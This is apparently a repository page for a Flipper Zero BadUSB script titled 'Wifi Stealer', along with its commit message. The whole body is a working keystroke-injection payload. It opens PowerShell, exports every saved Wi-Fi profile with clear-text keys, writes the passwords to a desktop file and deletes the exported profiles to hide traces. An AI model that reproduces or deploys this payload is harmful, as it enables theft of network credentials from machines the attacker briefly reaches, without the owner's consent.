Flipper/BadUSB/Wifi-Stealer_ORG.txt
jasniec 6c977513e6
Update Wifi-Stealer_ORG.txt
On my PC it does open in powershell location. I use power toys overlay for Run. This will redirect to the desktop from anywhere
2022-07-25 20:31:52 +02:00

14 lines
446 B
Plaintext

REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10/11
REM Version: 1.0
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
ENTER